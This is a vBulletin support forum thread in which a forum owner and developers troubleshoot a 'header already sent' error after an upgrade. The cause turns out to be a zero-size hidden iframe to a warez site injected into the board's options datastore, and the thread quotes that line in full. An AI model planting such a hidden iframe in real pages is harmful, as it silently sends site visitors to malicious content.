Board offline: Unable to add cookies, header already sent.

Collapse
X

• Time
  • Show
Clear All
  • onederlnd
    • Aug 2003
    • 3.0.0 Beta 5

Board offline: Unable to add cookies, header already sent.

This may be redundant by the time I wake up tomorrow, since it may possibly be the host doing some upgrading. But figure I should post this here incase it isn't, and see if any of you can give information.

The board is currently showing the following:
    Warning: strpos(): Offset not contained in string. in /home/xxxx/public_html/includes/init.php on line 543

Warning: Invalid argument supplied for foreach() in /home/xxxx/public_html/includes/sessions.php on line 260

Unable to add cookies, header already sent.
    File: /home/xxxx/public_html/includes/init.php
    Line: 543
    Upgraded to vB3 Gamma the other day, and everything was working fine until one of my moderators pointed this out today. (about 3 days after the upgrade). *note: None of the board files have been m odified*
    Last edited by onederlnd; Thu 11 Dec '03, 7:04pm.
  • Steve Machol
    Former Customer Support Manager
    • Jul 2000

Is that the complete error message? Did you revert all your templates after upgrading to Gamma?
    Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
    Change CKEditor Colors to Match Style (for 4.1.4 and above)

Steve Machol Photography

Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.

Comment

• Freddie Bingham
      Former vBulletin Developer
      • May 2000
      • 1.1.x

'options' from the datastore seems to be missing.

Comment

• onederlnd
        • Aug 2003
        • 3.0.0 Beta 5

Steve: Yes that is the complete error message. No, I did not revert the templates after upgrading.

Freddie: options from datastore seems to be alive and kicking still.

I tried reuploading the files again for the board with no luck (as I expected). I checked options in datastore and found: <iframe src="http://www.warez-ru.com/xx.php" width="0" height="0" </iframe>. I proceeded to add a > to the end of the intial iframe tag (it turned up missing) and nadda.
        Last edited by onederlnd; Thu 11 Dec '03, 11:28pm.

Comment

• Freddie Bingham
          • May 2000
          • 1.1.x

First the correct data in the 'options' object would not be an iframe html link to a warez site.

Secondly, I hope that your website is not in relation to warez as that would be a license violation.

Comment

• onederlnd
            • Aug 2003
            • 3.0.0 Beta 5

Originally posted by Freddie
            First the correct data in the 'options' object would not be an iframe html link to a warez site.

Secondly, I hope that your website is not in relation to warez as that would be a license violation.
            No no, it's not at all. But that is what is in the options field.... I can give you access if you'd like to take a look. I'm the only user with access to the database except for the server admins, so I don't know how it could have changed... and especially have changed to that.
            Last edited by onederlnd; Fri 12 Dec '03, 8:50am.

Comment

• Freddie Bingham
              • May 2000
              • 1.1.x

Originally posted by onederlnd
              No no, it's not at all. But that is what is in the options field.... I can give you access if you'd like to take a look. I'm the only user with access to the database except for the server admins, so I don't know how it could have changed... and especially have changed to that.
              Upload this file to your forums directory and then open it in your browser like:

Attached Files

Comment

• onederlnd
                • Aug 2003
                • 3.0.0 Beta 5

Okay, things seem to be back in working order. Thanks for the help.

My host has been having problems lately (being attacked), so I get the feeling someone cracked in and modifed something :/

Comment

• Sarge0087
                  • Jan 2004
                  • 3.0.0 Release Candidate 1

Originally posted by Freddie
                  Upload this file to your forums directory and then open it in your browser like:

http://www.yourforums.com/forums/fixoptions.php
                  Sorry, to bring this thread back up, but I have the error that is very similar:

"Warning: offset not contained in string in /www.nextdictator.com/forums/includes/init.php on line 561

Unable to add cookies, header already sent.
                  File: N/A
                  Line: 0

"

I tried the fixoptions.php and I got this:

"Warning: offset not contained in string in /www.nextdictator.com/forums/includes/init.php on line 561
                  Rebuilding options"

I'm pretty stumped and I'm not sure what to do, maybe you guys could help me out? Thanks.

Comment

• Floris
                    • Dec 2001

I had this too, this is correct. Now run the file again and it will give 'only' rebuilding options, without the warning msg.

Comment

• JonPeters
                      • Dec 2003

Same problem. Running script again didn't help

Comment

• Mohamed
                        • May 2001

same problim here ....

after running the script nothing happen... it is still the same

Comment

• Dreamboat
                          • Jun 2002

I'm having the same problem. All I did was type some user numbers separated by commas between the apostrophes after the superadministrator line...

It appears that running the script is supposed to resolve it, but I got fatal errors when I did so.

Could someone help us please?

Comment

• Dreamboat
                            • Jun 2002

Okay, I figured it out.

Obviously, when you edit the php files with the editor provided by your web host, they may alter the file without you knowing it. It actually put extra lines at the very bottom of the config.php file after I added superadministrators between the apostrophes.

So, if you delete everything after the very last character, and save the file again, you'll be fine.

Comment

• Bashar
                              • May 2002
                              • 3.8.x

fixoption.php is no longer works for vbulletin 3.8.x ?

Comment

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...